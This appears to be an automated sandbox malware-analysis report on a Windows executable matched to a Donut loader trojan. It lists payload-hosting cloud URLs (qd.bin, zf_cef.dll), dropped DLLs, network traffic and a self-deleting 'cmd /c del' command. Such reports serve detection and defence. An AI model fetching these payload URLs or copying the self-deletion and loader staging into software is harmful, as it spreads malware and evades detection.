Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2421071524.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2453413483.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dllO
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dlldll
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2387772212.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000CBB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2387902133.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dll
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2387902133.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dll-D
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2453413483.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dll2
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2387772212.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dlldll
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2453413483.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2387772212.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dlle
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2284874201.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcr120.dll
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2221305862.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2387772212.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2284874201.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcr120.dllx
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2387902133.0000000000CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dll
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000CAF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2387902133.0000000000CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dllnW9w
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/Tiw
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2453413483.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dll
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2453413483.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dllU
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2624315548.00000000049B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: LisectAVT_2403002B_185.exeString found in binary or memory: https://www.globalsign.com/repository/0
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000CBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/
Source: LisectAVT_2403002B_185.exeString found in binary or memory: https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.bin
Source: LisectAVT_2403002B_185.exeString found in binary or memory: https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.binC:
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000CBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/w
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownHTTPS traffic detected: 82.156.94.48:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 82.156.94.47:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 43.153.232.152:443 -> 192.168.2.5:49723 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior

System Summary

barindex
Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000003.2552378256.0000000000D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Program Files (x86)\Everything\4.bin, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\qd[1].bin, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_05C9E9B80_3_05C9E9B8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C42C00_3_036C42C0
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C645C0_3_036C645C
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C8C540_3_036C8C54
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C519C0_3_036C519C
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C55780_3_036C5578
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C59A80_3_036C59A8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_005F20A00_2_005F20A0
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_005FD1D90_2_005FD1D9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_006013AD0_2_006013AD
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_006036840_2_00603684
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_005FC9DD0_2_005FC9DD
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_005EFE5A0_2_005EFE5A
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: String function: 005EA740 appears 54 times
Source: LisectAVT_2403002B_185.exeStatic PE information: invalid certificate
Source: LisectAVT_2403002B_185.exeStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003998000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs LisectAVT_2403002B_185.exe
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2625258364.0000000005AC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs LisectAVT_2403002B_185.exe
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003941000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs LisectAVT_2403002B_185.exe
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2628033628.0000000006DEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs LisectAVT_2403002B_185.exe
Source: LisectAVT_2403002B_185.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000003.2552378256.0000000000D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Program Files (x86)\Everything\4.bin, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\qd[1].bin, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engineClassification label: mal88.evad.winEXE@5/19@3/3
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Program Files (x86)\EverythingJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcr120[1].dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5136:120:WilError_03
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2mss2rbn.cnk.ps1Jump to behavior
Source: LisectAVT_2403002B_185.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe "C:\Users\user\Desktop\LisectAVT_2403002B_185.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c del /q C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c del /q C:\Users\user\Desktop\LisectAVT_2403002B_185.exeJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: msisip.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: wshext.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: mi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: miutils.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: LisectAVT_2403002B_185.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: LisectAVT_2403002B_185.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: LisectAVT_2403002B_185.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: LisectAVT_2403002B_185.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: LisectAVT_2403002B_185.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: LisectAVT_2403002B_185.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: LisectAVT_2403002B_185.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: LisectAVT_2403002B_185.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: G:\Jenkins_MusicBoxWorkPrjCode\MusicBox_PUBLIC_RELESE_20-10-09_9.1.1.3\code\KwResource\bin\Release\pdb\KwTools.pdb source: LisectAVT_2403002B_185.exe
Source: Binary string: msvcr120.i386.pdb source: msvcr120[1].dll.0.dr, msvcr120.dll.0.dr
Source: Binary string: msvcp120.i386.pdb source: msvcp120.dll.0.dr, msvcp120[1].dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: LisectAVT_2403002B_185.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: LisectAVT_2403002B_185.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: LisectAVT_2403002B_185.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: LisectAVT_2403002B_185.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: LisectAVT_2403002B_185.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: msvcp140[1].dll.0.drStatic PE information: 0x771734A7 [Mon Apr 25 02:38:31 2033 UTC]
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_05C9A680 pushad ; ret 0_3_05C9A693
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C0439 push ebx; ret 0_3_036C0447
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C1A79 pushad ; ret 0_3_036C1A83
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C1A3C push ds; ret 0_3_036C1A67
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C3A04 push FFFFFFBEh; iretd 0_3_036C3A06
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C1AEF push esi; ret 0_3_036C1AF8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C185F push es; iretd 0_3_036C1868
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_005EA264 push ecx; ret 0_2_005EA277
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_0379104D push esp; ret 0_2_03791071
Source: msvcr120[1].dll.0.drStatic PE information: section name: .text entropy: 6.95576372950548
Source: msvcr120.dll.0.drStatic PE information: section name: .text entropy: 6.95576372950548
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcr120[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp120[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Program Files (x86)\Everything\msvcp120.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Program Files (x86)\Everything\vcruntime140.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\zf_cef[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Program Files (x86)\Everything\msvcr120.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Program Files (x86)\Everything\zf_cef.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Program Files (x86)\Everything\msvcp140.dllJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess created: "C:\Windows\System32\cmd.exe" /c del /q C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
